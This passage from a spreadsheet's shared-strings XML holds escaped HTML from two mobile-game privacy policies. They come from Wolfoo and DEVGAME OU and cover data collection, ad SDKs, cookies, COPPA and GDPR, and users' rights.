in our privacy policy and send a notification to users..</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/li&gt;
&lt;li&gt;&lt;i class="bi bi-check"&gt;&lt;/i&gt;(b) Information we collect passively:
We also collect certain technical non-personal information (which might be considered as personal
information under some legislations), such as
(1) IP Address;
(2) Log and usage data, such as game progress, game time, achievements, and error and crash reports. We
use this information to:
(i)allow you to connect to the server;
(ii)operate, provide, maintain, protect, manage, customize our Apps and the way in which we offer them;
(iii)enhance the experience with the Apps, detect fraud, security or technical issues in connection with
the Apps.
 &lt;/li&gt;
&lt;li&gt;&lt;i class="bi bi-check"&gt;&lt;/i&gt;
(c) Information collected by third parties:
</t>
  </si>
  <si>
    <t xml:space="preserve">In order to allows us to continue offering the Apps for free or at low cost, we may display advertisements
to you. To enable advertising tracking, we allow our advertising partners to collect device identifiers
(i.e. IDFA on iOS) that might be considered as personal information under some legislations. You can
choose whether to allow or disable our Apps from collecting this device identifier when prompted for an
authorization notification by your phone system or through the privacy settings in your phone system.
</t>
  </si>
  <si>
    <t>Currently, we only contract with Google LLC and Ironsource to provide advertising. By indicating our
content as child-directed, we disable any Interested-based ads and remarketing ads on our Apps.
 &lt;/li&gt;
&lt;/ul&gt;
&lt;p class="fst-italic"&gt;
The app does use third-party services that may collect information used to identify you.</t>
  </si>
  <si>
    <t xml:space="preserve">Link to the
privacy policy of third-party service providers used by the app
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://policies.google.com/privacy"&gt;Google Play Services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://support.google.com/admob/answer/6128543?hl=en"&gt;AdMob&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://firebase.google.com/policies/analytics"&gt; Google Analytics for Firebase&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://firebase.google.com/support/privacy/"&gt;Firebase Crashlytics&lt;/a&gt; &lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.is.com/ironsource-mobile/general/ironsource-mobile-child-directed-apps/"&gt;Ironsource&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 class="txt-policy"&gt;Information sharing&lt;/h4&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>We do not sell any of your personal information with or to any independent third parties. Situations where
we will disclose or allow the third party to collect (i.e. the device identifiers) your information are:
&lt;/p&gt;
&lt;p&gt;- Authorized third parties:&lt;/p&gt;
&lt;div class="table-responsive"&gt;
&lt;table class="table table-bordered" border="2"&gt;
&lt;tr&gt;
&lt;td&gt;Service Provider&lt;/td&gt;
&lt;td&gt;SDK name&lt;/td&gt;
&lt;td&gt;Purpose&lt;/td&gt;
&lt;td&gt;Privacy Policy&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google LLC&lt;/td&gt;
&lt;td&gt;Admob&lt;/td&gt;
&lt;td&gt;Advertising &lt;/td&gt;
&lt;td&gt;&lt;a href="https://policies.google.com/privacy?"&gt;https://policies.google.com/privacy?&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google LLC&lt;/td&gt;
&lt;td&gt;Firebase &lt;/td&gt;
 &lt;td&gt;Data Analysis &lt;/td&gt;
&lt;td&gt;&lt;a href="https://firebase.google.com/support/privacy"&gt;https://firebase.google.com/support/privacy&lt;/a&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google LLC&lt;/td&gt;
&lt;td&gt;Google Analytics&lt;/td&gt;
&lt;td&gt;
Data Analysis
&lt;/td&gt;
&lt;td&gt;&lt;a href="https://policies.google.com/privacy?hl=en-US"&gt;https://policies.google.com/privacy?hl=en-US&lt;/a&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Ironsource&lt;/td&gt;
&lt;td&gt;Ironsource&lt;/td&gt;
&lt;td&gt;Advertising &lt;/td&gt;
&lt;td&gt;&lt;a</t>
  </si>
  <si>
    <t xml:space="preserve">href="https://developers.is.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/"&gt;https://developers.is.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/&lt;/a&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p&gt;
- Business Transfers. We may transfer our information bases containing personal information in the event of
a
merger, acquisition, reorganization, bankruptcy, or other similar events, we will make an announcement in
advance, disclose the details of the event and information about the successor, and with the express consent
of you and/or your parent and/or guardian (if applicable) again.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
- Law Enforcement-related disclosure. We may be required to share information (including personal
information) collected if the information is required by law to prevent, investigate, or take action
regarding illegal activities, situations involving potential threats to physical safety, rights, property,
or of any person, suspected fraud and violations of our terms and agreements and in response to legal
process, court orders, subpoenas, or to establish or exercise our legal rights.
 &lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
COPPA
&lt;/h4&gt;
&lt;p&gt;
The US Children’s Onlne Privacy Protection Act (COPPA) requires us to inform parents or legal guardians
about how we collect, use, and disclose personal data from children under the age of 13.</t>
  </si>
  <si>
    <t>COPPA also requires
that we get consent from parents or legal guardians before we allow children under the age of 13 to use and
interact with some sections, applications, and activities on Wolfoo LLC's Games. We offer users a number of
activities, some of which are directed at children under the age of 13, and other activities that are
targeted at older users.
 &lt;/p&gt;
&lt;p&gt;
The General Data Protection Regulation (GDPR) requires us to inform parents or legal guardians about how we
collect, use, and disclose personal data from children under the age of 16 in some member countries of the
European Union.</t>
  </si>
  <si>
    <t>The GDPR also requires that we get consent from parents or legal guardians before we allow
children to use and interact with some sections, applications, and activities on Wolfoo LLC's Games.
 &lt;/p&gt;
&lt;p&gt;
 We comply with the Children’s Online Privacy Protection Act.</t>
  </si>
  <si>
    <t xml:space="preserve">We do not knowingly collect personal
information on children under the age of 13. When a user identifies himself or herself as a child under the
age of 13 through a support request or through any feedback, we will not collect, store or use, and will
delete in a secure manner, any personal information of such user. If you are a parent or guardian and you
are aware that your child has provided us with personal information, please contact us so that we will be
able to do the necessary actions.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Parental rights
&lt;/h4&gt;
&lt;p&gt;
At any time, parents can refuse to permit us to collect further personal information from their children and
can request that we delete from our records the personal information we have collected in connection with
that account. Please keep in mind that a request to delete information may lead to the deletion of an
account.
 &lt;/p&gt;
&lt;p&gt;
Parents can request access to and delete their child's personal information by logging on to the child's
account.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
Parents can also contact us to request access to, change, or delete their child's personal information by
sending an email to us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="aad9dfdadac5d8deeaddc5c6ccc5c5cdcbc7cfd984c9c5c7"&gt;[email&amp;#160;protected]&lt;/a&gt;
&lt;/p&gt;
&lt;h4 class="txt-policy"&gt;Log Data&lt;/h4&gt;
&lt;p&gt; We want to inform you that whenever you use my Service, in a case of an error in the app I collect data and
information (through third-party products) on your phone called Log Data. This Log Data may include
information such as your device Internet Protocol (“IP”) address, device name, operating system version, the
configuration of the app when utilizing my Service, the time and date of your use of the Service, and other
statistics.&lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Cookies
&lt;/h4&gt;
&lt;p&gt;
Cookies are files with a small amount of data that are commonly used as anonymous unique identifiers.</t>
  </si>
  <si>
    <t>These
are sent to your browser from the websites that you visit and are stored on your device's internal memory.
 This Service does not use these “cookies” explicitly. However, the app may use third-party code and
libraries that use “cookies” to collect information and improve their services.</t>
  </si>
  <si>
    <t xml:space="preserve">You have the option to
either accept or refuse these cookies and know when a cookie is being sent to your device. If you choose to
refuse our cookies, you may not be able to use some portions of this Service.
 &lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Service Providers
&lt;/h4&gt;
&lt;p&gt;We may employ third-party companies and individuals due to the following reasons:&lt;/p&gt;
&lt;p class="bi bi-check"&gt;To facilitate our Service;&lt;/p&gt;
&lt;p class="bi bi-check"&gt;To provide the Service on our behalf;&lt;/p&gt;
&lt;p class="bi bi-check"&gt;To perform Service-related services; or&lt;/p&gt;
&lt;p class="bi bi-check"&gt;To assist us in analyzing how our Service is used.&lt;/p&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We want to inform users of this Service that these third parties have access to their Personal Information.
 The reason is to perform the tasks assigned to them on our behalf. However, they are obligated not to
disclose or use the information for any other purpose.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Security
&lt;/h4&gt;
&lt;p&gt;
 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&lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Links to Other Sites
&lt;/h4&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t>This Service may contain links to other sites. If you click on a third-party link, you will be directed to
that site. Note that these external sites are not operated by me.</t>
  </si>
  <si>
    <t>Therefore, we strongly advise you to
review the Privacy Policy of these websites. we have no control over and assume no responsibility for the
content, privacy policies, or practices of any third-party sites or services.
 &lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Changes to This Privacy Policy
&lt;/h4&gt;
&lt;p&gt;
I may update our Privacy Policy from time to time.</t>
  </si>
  <si>
    <t>Thus, you are advised to review this page periodically
for any changes. I will notify you of any changes by posting the new Privacy Policy on this page.
 This policy is effective as of 2022-06-16
&lt;/p&gt;
&lt;h4 class="txt-policy"&gt;
Contact Us
&lt;/h4&gt;
&lt;p&gt;
If you have any questions or suggestions about my Privacy Policy, do not hesitate to contact me at
&lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="5a292f2a2a35282e1a2d35363c35353d3b373f297439353774"&gt;[email&amp;#160;protected]&lt;/a&gt;
&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/main&gt;
&lt;footer id="footer"&gt;
&lt;div class="container"&gt;
&lt;div class="copyright"&gt;
&amp;copy; Copyright &lt;strong&gt;&lt;span&gt;Wolfoo Games&lt;/span&gt;&lt;/strong&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">All Rights Reserved
&lt;/div&gt;
&lt;/div&gt;
&lt;/footer&gt;
&lt;a href="#" class="back-to-top d-flex align-items-center justify-content-center"&gt;&lt;i class="bi bi-arrow-up-short"&gt;&lt;/i&gt;&lt;/a&gt;
&lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"&gt;&lt;/script&gt;
&lt;script src="assets/vendor/php-email-form/validate.js"&gt;&lt;/script&gt;
&lt;script src="assets/js/main.js"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&gt;&lt;html&gt;&lt;head&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;title&gt;DEVGAME OU&lt;/title&gt;
	&lt;style type="text/css"&gt;
    div {
  }
div h1 {
  text-align: center;
  font-family: "Segoe UI light", "Segoe UI", "Helvetica";
}
a {
   color: rgb(12, 96, 193);
   text-decoration: none;
}
.logo {
    background-image: url(img/logo.jpg);
    background-position: center center;
    background-repeat: no-repeat;
    background-size: 26%;
    height: 300px;
    box-sizing: border-box;
	}
.mail { 
  height: 35vh;
  box-sizing: border-box;
  text-align: center;
}	  
.text { 
	font-family: "Segoe UI light", "Segoe UI", "Helvetica";
    box-sizing: border-box;
    text-align: left;
    margin: 0 10% 10% 10%;
}	  
.alogo  {
    display: block;
}			
    &lt;/style&gt;
    &lt;/head&gt;
    &lt;body&gt;
	 &lt;a class="alogo" href="http://devgamekids.com/"&gt;
	 &lt;div class="logo"&gt;	
	 &lt;/div&gt;	
	&lt;/a&gt;
	&lt;div class="text"&gt;	
		&lt;h1&gt;Privacy and cookie policy&lt;/h1&gt;
		&lt;div&gt;
			&lt;p&gt;Effective Date: April 01, 2018&lt;/p&gt;
			&lt;p&gt;DEVGAME OU, having company ID number 14600459, with headquarters located at Estonia, Pae tn 25-47, Harju maakond, 11414 ("DEVGAME" or "we") is dedicated to protecting the privacy rights of our online users ("users" or "you"). This Online Privacy and Cookie Policy (the "Policy") has been crafted to inform you as to the ways we collect, store, use, and manage the information you provide in connection with any DEVGAMEwebsite (collectively, the "Site"), or any DEVGAME game or application (the Site, games and applications are, collectively, the "Service"). Please note that the scope of this Policy is limited only to information collected by DEVGAME through use of the Service.</t>
  </si>
  <si>
    <t>This Policy does not apply to the practices of third parties that DEVGAME does not own or control.&lt;/p&gt;
			&lt;p&gt;When signing up for the Service, you are invited to agree with this Policy and the processing of your data, including your personal information, also called personal data in some jurisdictions (we refer to this information/data collectively as "personal information" throughout this Policy), in the manner provided in this Policy and our Terms of Use. We therefore process your personal information based on your consent. In any event, any use of the Service will be construed as your agreement with this Policy and our Terms of Use.</t>
  </si>
  <si>
    <t>If you do not agree to these terms, please do not use the Service.&lt;/p&gt;
			&lt;p&gt; It is advised that you review this Policy regularly as it may be amended from time to time as set out below (see the Changes to this Policy section below).
			 Information collection&lt;/p&gt;
			&lt;p&gt;We collect information about you directly from you, from third parties, and automatically through your use of our Service.</t>
  </si>
  <si>
    <t>We may combine the information that we collect about you from these various sources.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Information we collect directly from you&lt;/h2&gt;
			&lt;p&gt;We will also collect any information that you provide to us through your use of our Service. The types of personal information we collect may vary depending on your activity. Personal information may include:&lt;/p&gt;
			&lt;ul&gt;&lt;li&gt;Information provided by the User which is the necessary minimum for using the Application: name, surname, gender, mobile phone number and/or e-mail address;&lt;/li&gt;
			&lt;li&gt;Additional information provided by the User at the request of DEVGAME in order to fulfill the obligations of DEVGAME to the Users regarding the use of the Application.</t>
  </si>
  <si>
    <t>Specifically, DEVGAME has the right to request from the User a copy of an identity document or any other document containing the User's name, surname and photo, as well as any additional information that, at the discretion of DEVGAME, will be necessary and sufficient to identify the User and allow it to prevent abuses and infringements on the rights of third parties;&lt;/li&gt;
			&lt;li&gt;Any other User information processed by DEVGAME&lt;/li&gt;&lt;/ul&gt;
			&lt;p&gt;DEVGAME also processes other User information, including:&lt;/p&gt;
			&lt;ul&gt;&lt;li&gt;Standard data automatically received by the http server when a User accesses the Application and performs any subsequent actions (host IP address, type of the User's Operating System, the UDID of the User's device, and content accessed by the User, etc.);&lt;/li&gt;
			&lt;li&gt;Information obtained as a result of the User's actions when using the Applications;&lt;/li&gt;
			&lt;li&gt;Information obtained as a result of the actions of other Users via the Applications;&lt;/li&gt;
			&lt;li&gt;Personal User data received via the Applications, with the consent of the User, and necessary for the use of the Applications: name, surname, date of birth, profile photo, friends list, and other data;&lt;/li&gt;
			&lt;li&gt;Information provided by Users when using the applications, specifically, their nickname&lt;/li&gt;
			&lt;li&gt;When you pay for products offered for purchase though the Service, we will also collect your billing address and complete credit card information that enables us to receive your payment. Our payment processing service provider may also retain this information to enable you to purchase additional items through our Service without having to re-enter it each time. We do not directly access or store your credit card information and we will not use your payment information we collect except as needed to fulfill your purchase and/or communicate with you regarding your transaction.&lt;/li&gt;&lt;/ul&gt;
			&lt;p&gt;If you contact us via email (e.g., to contact customer support), we will collect your name and email address, as well as any other content included in the email, in order to send you a reply.</t>
  </si>
  <si>
    <t>We may use your personal information submitted in your communications to contact and respond to you.&lt;/p&gt;
			&lt;p&gt; Additionally, we may acquire information from you through your access and participation in message boards on the Service. This information may include posts, comments, photos or screenshots, videos, ratings, and in-game messages.</t>
  </si>
  <si>
    <t>If you post content to our Service, such information may be available to other users of our Service (e.g., in-game messages will be available to the recipient of your message and if you upload a profile picture, your image may be available to all other users of our Service). If you post your own content on our Service, your posting may become public and DEVGAME cannot prevent such information from being used in a manner that may violate this Policy, our TERMS OF USE, the law, or your personal privacy.&lt;/p&gt;
			&lt;p&gt;Information we collect automatically about your use of our Service&lt;/p&gt;
			&lt;p&gt;When you use the Service, we may record information regarding the use of the Service, and we may collect other information that is visible on your social network page in accordance with the relevant terms of use associated with that page.&lt;/p&gt;
			&lt;p&gt; The Service will also record game play information such as your high scores or game session duration.</t>
  </si>
  <si>
    <t>When you invite new members into your network on the Service or send messages through the Service, we collect and maintain the information associated with those messages, including email address and content.&lt;/p&gt;
			&lt;p&gt;If you use the Service on your mobile telephone or other mobile device, including iPads and tablets, we collect mobile device identifiers, including Media Access Control (MAC) address, and possibly IP address. In certain games we will create and assign to your device an identifier that is similar to an account number. We may collect the name you have associated with your device, device type, telephone number, country, and any other information you choose to provide, such as user name, character name, general location (based on your Internet Protocol ("IP") address) or e-mail address.</t>
  </si>
  <si>
    <t>This information is useful to us for troubleshooting and helps us understand usage trends.&lt;/p&gt;
			&lt;p&gt;Except as described in this Policy, we will not share this information with any third party. If you no longer wish to allow us to track or use this information, you may turn it off at the device level. Please note, the application may not work properly if we are unable to tell where you are coming from (country specific).&lt;/p&gt;
			&lt;p&gt;</t>
  </si>
  <si>
    <t>In addition, we create a unique user ID to track your use of our Service. This unique user ID is stored in connection with your account information to track the DEVGAME games you are playing.&lt;/p&gt;
			&lt;p&gt;Please see the Cookies section below for more information about the information we automatically collect about you.&lt;/p&gt;
			 &lt;p&gt;Public Information&lt;/p&gt;
			&lt;p&gt;Some of the information you give us when you register to play our games is open to the public, such as your profile picture, number of friends, your username, the list of games that you play and the date of registration.</t>
  </si>
  <si>
    <t>Should you wish to hide any of the information that is made public, you can do so by changing the settings to "only me" in the privacy settings tab of your profile.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Information use&lt;/h2&gt;
			&lt;p&gt;We need the above personal information for the purposes as described in this Policy, and not providing this information will have an impact on our ability to provide you with the Service. DEVGAME's primary objective in collecting user information is to provide and enhance the Service and to enable users to easily navigate and enjoy the Service. This includes sending you electronic communications related to the Service, from which you can unsubscribe at any time using the instructions in such communications.</t>
  </si>
  <si>
    <t>In addition, we may use user information for the following purposes:
			&lt;ul&gt;&lt;li&gt;Providing and improving our Services. To communicate with you, including via email or push notification, about your account and use of the Service, including to send Service and product updates; to respond to your inquiries; to provide you with news and newsletters, special offers, promotions, and other information we think may interest you; and for other informational, marketing, or promotional purposes. For more information about opting out of certain communications, please see the Your rights and choices in relation to your personal information section below.&lt;/li&gt;
			&lt;li&gt;Marketing and communications.</t>
  </si>
  <si>
    <t>To communicate with you, including via email or push notification, about your account and use of the Service, including to send Service and product updates; to respond to your inquiries; to provide you with news and newsletters, special offers, promotions, and other information we think may interest you; and for other informational, marketing, or promotional purposes. For more information about opting out of certain communications, please see the Your rights and choices in relation to your personal information section below.&lt;/li&gt;
			&lt;li&gt;Research and analytics. To analyze how you interact with the Service; to monitor and analyze usage and activity trends; and for other research, analytical, and statistical purposes.&lt;/li&gt;
			&lt;li&gt;Protecting rights and interests.</t>
  </si>
  <si>
    <t>To protect the safety, rights, property, or security of DEVGAME, the Service, any third party, or the general public; to detect, prevent or otherwise address fraud, security or technical issues; to prevent or stop activity which DEVGAME, in its sole discretion, may consider to be, or to pose a risk of being, an illegal, unethical, or legally actionable activity; to use as evidence in litigation; and to enforce this Policy and our TERMS OF USE.&lt;/li&gt;
			&lt;li&gt;Legal compliance. To comply with applicable legal or regulatory obligations, including as part of a judicial proceeding; to respond to a subpoena, warrant, court order, or other legal process; or as part of an investigation or request, whether formal or informal, from law enforcement or a governmental authority.&lt;/li&gt;&lt;/ul&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Cookies&lt;/h2&gt;
			&lt;p&gt;Like many services, DEVGAME uses server log files and automated data collection tools, such as cookies and web beacons (collectively, "Data Collection Tools") when you access or use our Service. We tie the information gathered by these means to our customers' personal information.</t>
  </si>
  <si>
    <t>These Data Collection Tools automatically track and collect certain technical information that your computer or device, such as your IP addresses, browser types, browser language, referring and exit pages, URLs, platform type, the number of clicks, domain names, landing pages, clickstream data, pages viewed and the order of those pages, the amount of time spent on particular pages, game information and the date and time of activity on our Service, and other similar information. In some cases, we will associate this technical information with your ID number for our internal use. By using our Service, you consent to our use of cookies, web beacons and Data Collection Tools.&lt;/p&gt;
			&lt;p&gt;</t>
  </si>
  <si>
    <t>We use cookies for a variety of reasons, including to: (i) analyze the usage of our Service; (ii) provide a more personalized experience; (iii) manage advertising; (iv) allow you to more easily login to our Service; (v) help make your use of our Service more efficient and more valuable by providing you with a customized experience and recognizing you when you return.&lt;/p&gt;
			&lt;p&gt; We may also employ web beacons or other technology for a variety of reasons such as: (i) allowing us to know if a certain page was visited or whether an email was opened; and (ii) tracking pixels, which allow us to advertise more efficiently by excluding our current users from certain promotional messages or identifying the source of a new installation.&lt;/p&gt;
			&lt;p&gt;You can set your web browser to warn you about attempts to place cookies on your computer, limit the type of cookies you allow or refuse cookies all together. We invite you to visit the support websites of the various browsers you may use to learn on how to block the use of Data Collection Tools.</t>
  </si>
  <si>
    <t>However, you may not be able to use some or all of the features of the Service if you refuse/disable cookies.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Third party services&lt;/h2&gt;
			&lt;p&gt;Please note that third party partners/providers, such as analytics companies or companies delivering advertisements in our games or on the Service, may also use cookies or other technologies, and those practices and providers are subject to their own policies.&lt;/p&gt;
			&lt;p&gt; We use mobile analytics software to allow us to better understand the functionality of our mobile software on your device. This software may record information such as how often you use the application, the events that occur within the application, aggregated usage, performance data, and where the application was downloaded from.</t>
  </si>
  <si>
    <t>We do not link the information we store within the analytics software to any personal information you submit within the mobile application.&lt;/p&gt;
			&lt;p&gt; Our Service may contain third party tracking tools from our service providers. Such third parties may use cookies, APIs, and SDKs in our services to enable them to collect and analyze user information on our behalf.</t>
  </si>
  <si>
    <t>The third parties may have access to information such as your device identifier, MAC address, geo-location information, and IP address for the purpose of providing their services under their respective privacy policies. This Policy does not cover the use of tracking tools from third parties. We do not have access or control over these third parties.</t>
  </si>
  <si>
    <t>The following are examples of the third parties that we use for analytics:&lt;/p&gt;
			&lt;h3&gt;Google Analytics&lt;/h3&gt;
			&lt;p&gt;DEVGAME uses a tool called "Google Analytics" to collect information about use of this Service. Google Analytics collects information such as how often users visit this Site, what pages they visit when they do so, and what other sites they used prior to coming to this Site. DEVGAME uses the information it gets from Google Analytics to understand Service usage and patterns and to improve its Service.</t>
  </si>
  <si>
    <t>Google Analytics collects only the IP address assigned to you on the date you visit a Service, rather than your name or other identifying information. DEVGAME does not combine the information collected through the use of Google Analytics with personal information. Although Google Analytics plants a permanent cookie on your web browser to identify you as a unique user the next time you visit a Service, the cookie cannot be used by anyone but Google.&lt;/p&gt;
			&lt;p&gt;</t>
  </si>
  <si>
    <t>Google's ability to use and share information collected by Google Analytics about your visits to our Service is restricted by the Google Analytics Terms of Use (as amended for government websites) and the Google Privacy Policy. You can prevent Google Analytics from recognizing you on return visits to this Site by disabling cookies on your browser or mobile device. For more information about Google Analytics, please see the &lt;a href="http://www.google.com/intl/en/policies/privacy/"&gt;Google Privacy Policy&lt;/a&gt;.</t>
  </si>
  <si>
    <t>To prevent Google Analytics from using your data through a web browser, you can get the &lt;a href="http://tools.google.com/dlpage/gaoptout/"&gt;Google Analytics Opt-out Browser Add-on.&lt;/a&gt;&lt;/p&gt;
			&lt;h3&gt;AppMetrica Analytics&lt;/h3&gt;
			&lt;p&gt;DEVGAME also uses AppMetrica to help understand usage of the Service. For more information about AppMetrica privacy practices, please see the &lt;a href="https://yandex.com/legal/metrica_termsofuse/" style=""&gt;Terms of Use of Yandex. Metriсa service&lt;/a&gt;;&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Sharing of information with third parties&lt;/h2&gt;
			&lt;p&gt;For the Kids Category, DEVGAME uses advertising which is self-hosted, non-targeted, non-personalized, and checked manually.</t>
  </si>
  <si>
    <t>This makes it suitable for age rating. No third parties involved.&lt;/p&gt;
			&lt;p&gt;Except as set forth in this Policy, DEVGAME does not share your personal information with any third parties. In the event we offer services or promotions where your information is separately collected and used according to the privacy policy of a third party, we will inform you of that at the time of collection and you may elect not to participate in the service or promotion.&lt;/p&gt;
			&lt;p&gt;</t>
  </si>
  <si>
    <t>We will share your information with other DEVGAME users as necessary to provide our Services. For example, if you post a profile picture, that picture may be available to all other users of our Services.&lt;/p&gt;
			&lt;p&gt; We also may share your information with third parties as required by legal or regulatory obligations; as requested by law enforcement or other government officials in connection with an investigation of fraud, intellectual property infringements, or other activity that is illegal or may expose you or us to legal liability; or as DEVGAME otherwise deems necessary to detect, prevent, or otherwise address fraud, security, technical issues, or other threats to DEVGAME or others.&lt;/p&gt;
			&lt;p&gt;We may share your information with third party companies that perform services on our behalf, including payment processing, order fulfillment, data analysis, marketing services, email campaigns, hosting services, and customer service.</t>
  </si>
  <si>
    <t>While providing the services for us, these companies may access your personal information, and are required to use it solely as directed by us for the purpose of our requested service.&lt;/p&gt;
			&lt;p&gt; In conjunction with the running of our games we may partner with a third party to assist us in providing you with our Service. We will share the information you provide us through your social network, such as (1) your first and last name; (2) your profile picture or its URL; (3) your user identification number of the pertinent social network, which is linked to publicly available information such as name and profile picture; (4) the login email you provide to the pertinent social network upon registration; and (5) game play information with these third parties so they may facilitate the use of our Service as well as contact you about other games which may be of interest to you, service notifications and to solicit your feedback and input.</t>
  </si>
  <si>
    <t>If you do not wish to have this information shared please do not use our Service. If you wish to no longer have your personal information used by our partners you may contact us at support@devgameou.com and we will facilitate your request to the partner.&lt;/p&gt;
			&lt;p&gt;We may disclose your information to another entity in connection with, including during negotiations of, an acquisition or merger, sale or transfer of a business unit or assets, bankruptcy proceeding, or as part of any other similar business transfer.&lt;/p&gt;
			&lt;p&gt;We may use and share with third party advertisers (and other third parties) certain technical information and other non-personal information to show general demographic and preference information among DEVGAME users. We may also allow advertisers to collect technical information and other non-personal information, which they may share with us, through the use of tracking technologies like cookies and web beacons.</t>
  </si>
  <si>
    <t>The information collected may be used to offer you targeted ad-selection and delivery in order to personalize your user experience by increasing the likelihood that advertisements for products and services you see will appeal to you, a practice known as behavioral advertising, and to undertake web analytics (i.e. to analyze traffic and other end user activity to improve your experience). Please see the your rights and choices in relation to your personal information section below for more information about opting out of behavioral advertising.&lt;/p&gt;
			&lt;p&gt;Information about our users is an integral part of our business. We share your personal information only as described in this Policy.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Storage of your personal information&lt;/h2&gt;
			&lt;p&gt;</t>
  </si>
  <si>
    <t>The personal information we collect, as described in this Policy, is being stored on servers in the United States and is accessible to our offices in Estonia, Ukraine and Russia. You expressly agree with your personal information being stored and processed in those countries.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Data retention&lt;/h2&gt;
			&lt;p&gt; We will keep you information for as long as we need your data to allow you to use the Service, though generally no longer than 5 years.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Security&lt;/h2&gt;
			&lt;p&gt;</t>
  </si>
  <si>
    <t>We have implemented commercially reasonable technical, physical, managerial and organizational measures designed to secure your personal information from accidental loss and from unauthorized access, use, alteration or disclosure. However, we cannot guarantee that unauthorized third parties will never be able to defeat those measures or use, disclose, or alter your personal information for improper purposes. Also please note that email and messaging systems are not considered secure, so we discourage you from sending us personal information through these mediums.&lt;/p&gt;
			&lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">In the event that personal information has been or is compromised as a result of a breach of security, DEVGAME will promptly notify those persons whose personal information has been compromised, in accordance with the notification procedures set forth in this Policy, or as otherwise required by applicable law.&lt;/p&gt;
			&lt;p&gt;To protect your privacy and security, we may take reasonable measures (such as requiring a unique password) to verify your identity before permitting you access to your account or the Service. You are responsible to maintain the secrecy of your unique password and account information, and for controlling access to your email communication or interaction through the Site or DEVGAME's authorized social networking at all times.&lt;/p&gt;
		&lt;/div&gt;
		&lt;div&gt;
			&lt;h2&gt;Your rights and choices in relation to your personal information&lt;/h2&gt;
			&lt;p&gt;Accessing, correcting, or deleting your personal information&lt;/p&gt;
			&lt;p&gt;DEVGAME takes your privacy seriously and works in a transparent way. In that sense, upon providing sufficient identification (to protect others' privacy), you can request information from us about the personal information we hold in relation to you and you can correct any inaccurate data we hold.&lt;/p&gt;
			</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt; Furthermore, you can change or delete any personal information by changing the applicable information found in your DEVGAME account. However, by deleting the entirety of this information your account may become deactivated.
			</t>
  </si>
  <si>
    <t>In certain territories (including the EU), you also have a legal right to ask for a restriction of processing, to object to processing as well as the right to data portability. However, these rights are subject to conditions and may not always be applicable.&lt;/p&gt;
			&lt;p&gt; You have the right to withdraw your consent, on the basis of which we process your personal information, at any time, by closing your account or otherwise clearly indicating your withdrawal of consent.</t>
  </si>
  <si>
    <t>However, this does not affect our lawful processing based on your consent before this withdrawal.&lt;/p&gt;
			&lt;h3&gt;Marketing communications&lt;/h3&gt;
			&lt;p&gt; We may send periodic promotional or informational emails to you. You may opt out of such communications by following the opt-out instructions contained in the e-mail.</t>
  </si>
  <si>
    <t>Please note that it may take up to 10 business days for us to process opt-out requests. If you opt-out of receiving emails about recommendations or other information we think may interest you, we may still send you e-mails about your account or any Service you have requested or received from us.&lt;/p&gt;
			&lt;h3&gt;Push notifications&lt;/h3&gt;
			&lt;p&gt; We may occasionally send you push notifications through our mobile applications to send you game updates, high scores and other service related notifications that may be of importance to you.</t>
  </si>
  <si>
